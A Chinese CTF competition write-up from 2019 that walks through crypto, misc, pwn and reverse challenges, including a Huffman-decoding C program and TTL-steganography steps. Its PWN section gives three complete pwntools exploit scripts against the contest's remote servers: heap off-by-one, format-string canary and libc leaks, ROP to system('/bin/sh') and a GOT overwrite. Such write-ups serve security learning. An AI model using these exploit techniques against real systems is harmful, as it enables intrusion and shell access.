这次比赛是我参加以来成绩最好的一次,这离不开我们的小团队中任何一个人的努力,熬了一整天才答完题,差点饿死在工作室(门卫大爷出去散步,把大门锁了出不去,还好学弟提了几个盒饭用网线从窗户钓上来才吃到了午饭)。写好WP回到宿舍的时候已经快十二点了,随便吃了点面包倒头就睡......

接下来大概写写我们的解题思路,由于做题的时候没想到可以进名次,而且赛后比赛平台也关了,所以很多实现过程的截图就没法弄了,只下了除web以外的题目。

 

CRYPTO

 

第一题 HardGame

这道题我们并没有做出来,可以看看大佬写的-->https://mp.weixin.qq.com/s/rlSyABoulRKygPmwfcUuXA

第二题 哈夫曼之谜

下载下来的压缩包里就两个文件

在txt文档内容如下:

 看到哈夫曼我记得当初好像是在数据结构里面学过,果断找书,百度查资料,后来了解到,上面01的部分其实可以看做是加密的密文,下面相当于解密的秘钥。

在下面的两列中,第一列是哈夫曼树的叶子节点,第二列是对应的权重值,之后就是长久的网上找代码(没办法,代码功底有点差,写起来太费时间了,只能网上找找改改)

找到的代码如下(在vs中运行的,之前的代码在运行的时候因为数组设置的太小,之后会有溢出,所以我改了下数组大小):

  1 #include <stdio.h>
  2 #include <stdlib.h>
  3 #include <string.h>
  4 
  5 typedef int ELEMTYPE;
  6 
  7 // 哈夫曼树结点结构体
  8 typedef struct HuffmanTree
  9 {
 10     ELEMTYPE weight;
 11     ELEMTYPE id;        // id用来主要用以区分权值相同的结点,这里代表了下标
 12     struct HuffmanTree* lchild;
 13     struct HuffmanTree* rchild;
 14 }HuffmanNode;
 15 
 16 // 构建哈夫曼树
 17 HuffmanNode* createHuffmanTree(int* a, int n)
 18 {
 19     int i, j;
 20     HuffmanNode **temp, *hufmTree;
 21     temp = malloc(n*sizeof(HuffmanNode));
 22     for (i = 0; i<n; ++i)     // 将数组a中的权值赋给结点中的weight
 23     {
 24         temp[i] = (HuffmanNode*)malloc(sizeof(HuffmanNode));
 25         temp[i]->weight = a[i];
 26         temp[i]->id = i;
 27         temp[i]->lchild = temp[i]->rchild = NULL;
 28     }
 29 
 30     for (i = 0; i<n - 1; ++i)       // 构建哈夫曼树需要n-1合并
 31     {
 32         int small1 = -1, small2;      // small1、small2分别作为最小和次小权值的下标
 33         for (j = 0; j<n; ++j)         // 先将最小的两个下标赋给small1、small2(注意:对应权值未必最小)
 34         {
 35             if (temp[j] != NULL && small1 == -1)
 36             {
 37                 small1 = j;
 38                 continue;
 39             }
 40             else if (temp[j] != NULL)
 41             {
 42                 small2 = j;
 43                 break;
 44             }
 45         }
 46 
 47         for (j = small2; j<n; ++j)    // 比较权值,挪动small1和small2使之分别成为最小和次小权值的下标
 48         {
 49             if (temp[j] != NULL)
 50             {
 51                 if (temp[j]->weight < temp[small1]->weight)
 52                 {
 53                     small2 = small1;
 54                     small1 = j;
 55                 }
 56                 else if (temp[j]->weight < temp[small2]->weight)
 57                 {
 58                     small2 = j;
 59                 }
 60             }
 61         }
 62         hufmTree = (HuffmanNode*)malloc(sizeof(HuffmanNode));
 63         hufmTree->weight = temp[small1]->weight + temp[small2]->weight;
 64         hufmTree->lchild = temp[small1];
 65         hufmTree->rchild = temp[small2];
 66 
 67         temp[small1] = hufmTree;
 68         temp[small2] = NULL;
 69     }
 70     free(temp);
 71     return hufmTree;
 72 }
 73 
 74 // 以广义表的形式打印哈夫曼树
 75 void PrintHuffmanTree(HuffmanNode* hufmTree)
 76 {
 77     if (hufmTree)
 78     {
 79         printf("%d", hufmTree->weight);
 80         if (hufmTree->lchild != NULL || hufmTree->rchild != NULL)
 81         {
 82             printf("(");
 83             PrintHuffmanTree(hufmTree->lchild);
 84             printf(",");
 85             PrintHuffmanTree(hufmTree->rchild);
 86             printf(")");
 87         }
 88     }
 89 }
 90 
 91 // 递归进行哈夫曼编码
 92 void HuffmanCode(HuffmanNode* hufmTree, int depth)      // depth是哈夫曼树的深度
 93 {
 94     static int code[100];
 95     if (hufmTree)
 96     {
 97         if (hufmTree->lchild == NULL && hufmTree->rchild == NULL)
 98         {
 99             printf("id为%d权值为%d的叶子结点的哈夫曼编码为 ", hufmTree->id, hufmTree->weight);
100             int i;
101             for (i = 0; i<depth; ++i)
102             {
103                 printf("%d", code[i]);
104             }
105             printf("\n");
106         }
107         else
108         {
109             code[depth] = 0;
110             HuffmanCode(hufmTree->lchild, depth + 1);
111             code[depth] = 1;
112             HuffmanCode(hufmTree->rchild, depth + 1);
113         }
114     }
115 }
116 
117 // 哈夫曼解码
118 void HuffmanDecode(char ch[], HuffmanNode* hufmTree, char string[])     // ch是要解码的01串,string是结点对应的字符
119 {
120     int i;
121     int num[500];
122     HuffmanNode* tempTree = NULL;
123     for (i = 0; i<strlen(ch); ++i)
124     {
125         if (ch[i] == '0')
126             num[i] = 0;
127         else
128             num[i] = 1;
129     }
130     if (hufmTree)
131     {
132         i = 0;      // 计数已解码01串的长度
133         while (i<strlen(ch))
134         {
135             tempTree = hufmTree;
136             while (tempTree->lchild != NULL && tempTree->rchild != NULL)
137             {
138                 if (num[i] == 0)
139                 {
140                     tempTree = tempTree->lchild;
141                 }
142                 else
143                 {
144                     tempTree = tempTree->rchild;
145                 }
146                 ++i;
147             }
148             printf("%c", string[tempTree->id]);     // 输出解码后对应结点的字符
149         }
150     }
151 }
152 
153 int main()
154 {
155     int i, n;
156     printf("请输入叶子结点的个数:\n");
157     while (1)
158     {
159         scanf("%d", &n);
160         if (n>1)
161             break;
162         else
163             printf("输入错误,请重新输入n值!");
164     }
165 
166     int* arr;
167     arr = (int*)malloc(n*sizeof(ELEMTYPE));
168     printf("请输入%d个叶子结点的权值:\n", n);
169     for (i = 0; i<n; ++i)
170     {
171         scanf("%d", &arr[i]);
172     }
173 
174     char ch[500], string[500];
175     printf("请连续输入这%d个叶子结点各自所代表的字符:\n", n);
176     fflush(stdin);      // 强行清除缓存中的数据,也就是上面输入权值结束时的回车符
177     gets(string);
178 
179     HuffmanNode* hufmTree = NULL;
180     hufmTree = createHuffmanTree(arr, n);
181 
182     printf("此哈夫曼树的广义表形式为:\n");
183     PrintHuffmanTree(hufmTree);
184     printf("\n各叶子结点的哈夫曼编码为:\n");
185     HuffmanCode(hufmTree, 0);
186 
187     printf("要解码吗?请输入编码:\n");
188     gets(ch);
189     printf("解码结果为:\n");
190     HuffmanDecode(ch, hufmTree, string);
191     printf("\n");
192 
193     free(arr);
194     free(hufmTree);
195 
196     return 0;
197 }

 

最后输出结果:

最后出来的格式有点问题,要处理一下

 

 MISC

第一题 最短的路

题目如下:

这个题我后来看别人WP说是BSF算法,这个我也不太懂,以前没碰到过,但是我们学弟直接手撸,就出来了,哈哈~

 

 我看也有人写了脚本:

第二题 奇怪的TTL字段

题目描述如下:

我们截获了一些IP数据报,发现报文头中的TTL值特别可疑,怀疑是通信方嵌入了数据到TTL,我们将这些TTL值提取了出来,你能看出什么端倪吗?

在txt文档中全是这种数字,以前遇到过类似的题型,首先都是把里面的数字提取出来,再做处理

至于对数字该怎么处理,就查了好对资料,后来找到一篇文章提醒了我

最后处理方式如下:

63 127 191 255对应00 01 10 11

(如果是2种情况就猜0 1,4种情况就猜00 01 10 11,转换为8位二进制,然后只取前两位,因为观察会发现后面几位都是1)

之后就是对数据的进制转换了,最终转成十六进制

在最后转换出的结果中,发现了六个jpg的文件头(ffd8),说明这就是六张图片,放在winhex生成图片

再用PS合成了一张二维码的图片

扫描结果如下所示:

根据单词AutomaticKey想到了是:自动密钥密码

解密网址:http://ctf.ssleye.com/autokey.html

这种加密只是针对字母,所以解密之后把对应的数字加上就可以了。

附py脚本如下(因为代码有点多,所以就只上截图了)

第三题 crackme

这道题我们没有做出来,可以看大佬写的wp--->https://mp.weixin.qq.com/s/rlSyABoulRKygPmwfcUuXA

PWN

第一题 Storm Note

 

直接上exp

 1 from pwn import *
 2 #p=process('./storm')
 3 p=remote('ctf1.linkedbyx.com',10444)  //网址+端口
 4 #port:10444
 5 def add(size):
 6   p.recvuntil('Choice')
 7   p.sendline('1')
 8   p.recvuntil('?')
 9   p.sendline(str(size))
10   
11 def edit(idx,mes):
12   p.recvuntil('Choice')
13   p.sendline('2')
14   p.recvuntil('?')
15   p.sendline(str(idx))
16   p.recvuntil('Content')
17   p.send(mes)
18 
19 def dele(idx):
20   p.recvuntil('Choice')
21   p.sendline('3')
22   p.recvuntil('?')
23   p.sendline(str(idx))
24 
25 add(0x18)     #0
26 add(0x508)    #1
27 add(0x18)     #2
28 edit(1, 'h'*0x4f0 + p64(0x500))   #set fake prev_size
29 
30 add(0x18)     #3
31 add(0x508)    #4
32 add(0x18)     #5
33 edit(4, 'h'*0x4f0 + p64(0x500))   #set fake prev_size
34 add(0x18)     #6
35 
36 dele(1)
37 edit(0, 'h'*(0x18))    #off-by-one
38 add(0x18)     #1
39 add(0x4d8)    #7
40 dele(1)
41 dele(2)         #backward consolidate
42 add(0x38)     #1
43 add(0x4e8)    #2
44 
45 dele(4)
46 edit(3, 'h'*(0x18))    #off-by-one
47 add(0x18)     #4
48 add(0x4d8)    #8
49 dele(4)
50 dele(5)         #backward consolidate
51 add(0x48)     #4
52 
53 dele(2)
54 add(0x4e8)    #2
55 dele(2)
56 storage = 0xabcd0100
57 fake_chunk = storage - 0x20
58 
59 p1 = p64(0)*2 + p64(0) + p64(0x4f1) #size
60 p1 += p64(0) + p64(fake_chunk)      #bk
61 edit(7, p1)
62 
63 p2 = p64(0)*4 + p64(0) + p64(0x4e1) #size
64 p2 += p64(0) + p64(fake_chunk+8)    #bk, for creating the "bk" of the faked chunk to avoid crashing when unlinking from unsorted bin
65 p2 += p64(0) + p64(fake_chunk-0x18-5)   #bk_nextsize, for creating the "size" of the faked chunk, using misalignment tricks
66 edit(8, p2)
67 add(0x48)
68 edit(2,p64(0)*8)
69 
70 p.sendline('666')
71 p.send('\x00'*0x30)
72 '''
73 add(0x100-8)
74 add(0x200)
75 add(0x100)
76 
77 edit(1,(p64(0x200)+p64(0x100))*32)
78 dele(1)
79 edit(0,'a'*(0x100-8))
80 add(0x100)
81 add(0x60)
82 dele(1)
83 dele(2)
84 add(0x100)
85 add(0x60)
86 '''
87 p.interactive()

 

 

第二题 story

 

这个题好像是libc泄露

上exp

#!/usr/bin/env python
# coding=utf-8
from pwn import *
io = remote('ctf1.linkedbyk.com', 10195)  //网址+端口号
#io = process('./story')
elf = ELF('./story')
#libc = elf.libc
libc = ELF('libc6_2.23-0ubuntu10_amd64.so')

io.recv()
__libc_start_main_got = elf.got['__libc_start_main']
payload = "%15$llx"+"AAAAAAAA"  + "%11$s" + "QQQQ" + p64(__libc_start_main_got)
print payload
io.sendline(payload)
io.recvuntil("Hello ")
cannary = int(io.recvuntil('AAAAAAAA', drop = True),16)
print hex(cannary)
temp = io.recv()[0:6]
__libc_start_main_addr = u64(temp+p8(0)*2)
libc_base = __libc_start_main_addr - libc.symbols['__libc_start_main']
print hex(__libc_start_main_addr)
#one_gadgets = libc_base + 0xf1147
system_addr = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search('/bin/sh').next()
#get one_gadgetA
print "get_addr = " + hex(__libc_start_main_addr)
#print "one_gadgets = "+ hex(one_gadgets)
print "get_got = " + hex(__libc_start_main_got)
print "cannay= " + hex(cannary)
print "system_addr=" + hex(system_addr)
print "bin_sh=" + hex(bin_sh)
pop_rdi = 0x0000000000400bd3
#gdb.attach(io)
payload = 'A'*136 + p64(cannary) * 2 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
#payload = 'A'*136 + p64(cannary) * 2 + p64(one_gadgets)

print hex(cannary)
Size = len(payload)+1
print "size = " + str(Size)
io.sendline(str(len(payload)))
#gdb.attach(io)
print io.recv()
io.sendline(payload)
io.interactive()

 

第三题 noinfoleak

 

 exp

 1 from pwn import *
 2 #p=process('./noinfoleak')
 3 libc = ELF('./libc-2.23.so')
 4 p=remote('ctf1.linkedbyx.com',10426)  //网址+端口
 5 def add(size,mes):
 6   p.recvuntil('>')
 7   p.sendline('1')
 8   p.recvuntil('>')
 9   p.sendline(str(size))
10   p.recvuntil('>')
11   p.send(mes)
12 
13 def dele(idx):
14   p.recvuntil('>')
15   p.sendline('2')
16   p.recvuntil('>')
17   p.sendline(str(idx))
18 def edit(idx,mes):
19   p.recvuntil('>')
20   p.sendline('3')
21   p.recvuntil('>')
22   p.sendline(str(idx))
23   p.recvuntil('>')
24   p.send(mes)
25 
26 add(0x60,p64(0x71)*4)
27 add(0x60,p64(0x71)*4)
28 add(0x60,p64(0x71)*4)
29 dele(0)
30 dele(1)
31 edit(1,'\x10')
32 add(0x60,p64(0x71)*4)
33 add(0x60,p64(0x71)*4)
34 add(0x50,'aaa')
35 add(0x50,'bbb')
36 edit(0,p64(0)+p64(0xd1))
37 dele(4)
38 a = 0x46# int(raw_input("a"),16)
39 edit(0,p64(0)+p64(0x71)+'\x5d'+chr(a))
40 dele(1)
41 dele(2)
42 edit(2,'\x10')
43 add(0x60,'a')
44 add(0x60,'\x00')
45 add(0x60,'\x00')
46 dele(5)
47 dele(6)
48 edit(6,p64(0x601120))
49 add(0x50,'/bin/sh\x00')
50 add(0x50,'\x20')
51 edit(9,p64(0xfbad3c80)+p64(0)*3+p8(0))
52 p.send('\n')
53 p.recv(24)
54 addr = u64(p.recv(6).ljust(8,'\x00'))
55 libc_base = addr - (0x7fb4e88cf6e0-0x7fb4e850c000)
56 info("libc:0x%x",libc_base)
57 system = libc_base+libc.symbols['system']
58 edit(11,p64(0x601018))
59 edit(9,p64(system))
60 dele(10)
61 
62 p.interactive()

REVERSE

第一题 easyCpp

 

用IDA打开,分析函数代码,发现好像是输入过两个变换

其他所有的数加上最后一个
- 顺序整个反过来,最后一个不变
最后要变成一个斐波那契数列1 1 2 3 5 ... 987,可以得输入

 

第二题 Junk_Instruction

 

这道题我们没有做出来,可以看大佬写的wp--->https://mp.weixin.qq.com/s/rlSyABoulRKygPmwfcUuXA

 

第三题 Testre

 

直接用IDA打开,F5查看函数,主要是对代码的分析,涉及到了些算法

 

看下面的这点代码,好像是辗转相除法

 

 

之后查看字符串 主菜单View-Open subviews-strings,看到table

 

 

之后就是Base58解密了,网址:http://ctf.ssleye.com/base85.html

 (之后再学习后会再进一步详细补充)

2019-04-08  11:35:05